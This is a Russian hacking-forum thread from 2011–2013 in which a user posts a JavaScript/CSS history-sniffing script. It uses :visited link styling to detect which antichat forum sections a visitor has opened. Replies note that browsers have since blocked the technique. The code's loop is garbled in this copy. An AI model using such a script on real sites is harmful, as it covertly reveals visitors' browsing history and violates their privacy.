PDA

Просмотр полной версии : CSS History Hack (на примере разделов ачата)


M_script
25.05.2011, 05:18
Этому методу уже 5 лет и наверное многие его знают, но на форуме я не нашел ни одной темы о нем.

Метод основан на отличии внешнего вида посещенных ссылок от непосещенных в большинстве браузеров. Это позволяет с помощью JS узнать, какие сайты посещал пользователь.

Следующий код проверяет, в какие разделы на ачате заходил посетитель сайта и в каких создавал темы.




#x a:visited{height:1px;width:1px;display:block;o verflow:hidden;margin:1px;}



vardomains= new Array(

'/',

'/',

'http://forum.antichat.net/',

'https://forum.antichat.net/'

);

varforums= new Array();

forums[0] = new Array(

'---',

'---',

'---',

'---',

'---',

'ИНФО',

'Level 7',

'---',

'---',

'Чаты',

'---',

'---',

'ICQ',

'E-Mail',

'---',

'Форумы',

'---',

'---',

'---',

'АнтиАдмин',

'Электроника и Фрикинг',

'Video.Antichat',

'Мировые новости. Обсужден ия.',

'С/С++, C#, Delphi, .NET, Asm',

'---',

'---',

'---',

'---',

'---',

'Статьи',

'Авторские статьи',

'Чужие Статьи',

'---',

'---',

'Оффтоп',

'---',

'PHP, PERL, MySQL, JavaScript',

'Обсуждение Ваших сайтов',

'Модераторский (Level 7)',

'ICQ - Покупка, продажа',

'Безопасность',

'Windows',

'*nix',

'Просьбы о взломах',

'---',

'Болталка',

'Soft - Windows',

'Soft - *nix',

'Antichat\'s Quest',

'---',

'---',

'Разное - Покупка, продажа, обмен',

'---',

'---',

'---',

'---',

'О Работе',

'Новости мира "железа"',

'Сотовый фрикинг',

'"Железо"',

'Схемы, программы, прошивк ',

'---',

'Телефония и связь',

'---',

'---',

'Жалобы и предложения',

'Правила форума',

'---',

'---',

'---',

'---',

'Forum for discussion of ANTICHAT',

'---',

'Уязвимости',

'---',

'Криптография, расшифровка хешей',

'---',

'---',

'---',

'Защита ОС: вирусы, антив русы, файрволы.',

'Анонимность',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'Избранное',

'---',

'---',

'ПО для Web разработчика',

'---',

'Реверсинг',

'---',

'---',

'Antichat',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'Программирование',

'Проверка на уязвимости',

'Безопасность и Уязвимост ',

'Квесты',

'Беспроводные технологии/WPAN/WLAN',

'Сценарии/CMF/СMS',

'SЕО/Финансовые задачи/Социальные сети',

'SЕО - тонкости, методы раскрут и',

'Белые методы раскрутки',

'Черные методы раскрутки',

'Статьи',

'---',

'---',

'Новости форума',

'Администрирование',

'*nix системы',

'Windows системы',

'---',

'Партнерки',

'Level 6',

'Уязвимости (Level 6)',

'Релизы (Level 6)',

'---',

'---',

'Социальные сети',

'Социальные сети',

'---',

'---',

'---',

'---',

'---',

'AntiDDos - АнтиДДОС',

'Услуги, Покупка и Продажа в SEO',

'Платежные системы: Webmoney, Y andex Деньги, РБК Деньги и т . д.',

'---',

'Задания (Level 6)',

'Хостинги - Hostings',

'Покупка, Продажа, Обмен',

'VPN, Proxy, Socks - Покупка, продажа',

'Хостинг, Dedicated, VDS, Сервера - Покупка, продажа',

'Инвайты, mails, базы - Покупка, продажа',

'Мобильная связь, СМС - Покупка, продажа',

'Трафик, лоады, инсталлы, з агрузки - Покупка, продажа',

'Доступы, shells, ftp - Покупка, продажа',

'Заявки на модерирование ( Level 7)',

'Закрытые заявки на модер рование (Level 7)',

'Видео-Конкурс [лето 2010]',

'Новогодний Видео-Конкурс [2011]',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---',

'---'

);

forums[1] = new Array();

forums[2] = new Array();

varnewDiv=document.createElement('div');

newDiv.id='x';

document.body.appendChild(newDiv);

for(vari=0;i'+

forums[0][i] +

'
');

}

}

document.write('
Вы создавали темы в разде лах:
');

for(vari=0;i'+

forums[0][i] +

'
');

}

}







Пример - http://mscript.biz/csshistory/

Метод может быть использован, как дополнительная защита от мультиаккаунтов, если при регистрации проверять, посещал ли человек страницы, доступные только зарегистрированным пользователям, например:

/usercp.php?

/private.php?

/myip.php

/forum66.html

/newthread.php?do=newthread&f=[1-200]

gibson
25.05.2011, 10:35
плохо искал. была и не раз)

M_script
25.05.2011, 18:28
плохо искал. была и не раз)


Искал через гугл:

history hack site:antichat.ru

css hack site:antichat.ru

javascript история браузера site:antichat.ru

javascript history браузера site:antichat.ru​

Единственное, что нашел - StartPanic пугает "взломом" истории браузера (https://antichat.live/showthread.php/t/117986/) в мировых новостях.

M_script
25.10.2013, 12:13
Уже 7 лет прошло, тема все еще актуальна, а на ачате до сих пор нет описания и примеров. В паблик.

winstrool
25.10.2013, 19:43
Уже 7 лет прошло, тема все еще актуальна, а на ачате до сих пор нет описания и примеров. В паблик.


На ачате мало сильно знающих эту технику так, как знаешь ее ты! обычные пасивки, активки и не болие того. хотя сама эта уязвимость дает большие перспективы! есть мысли но после того как появится время, это все протестировать...

KIR@PRO
05.11.2013, 16:22
пробовал в FF, не работает. Поискал решение, говорят теперь в браузерах стоит запрет на изменение размера шрифта в классе посещенных ссылок. Мол им, теперь, только цвет текста и фона менять можно...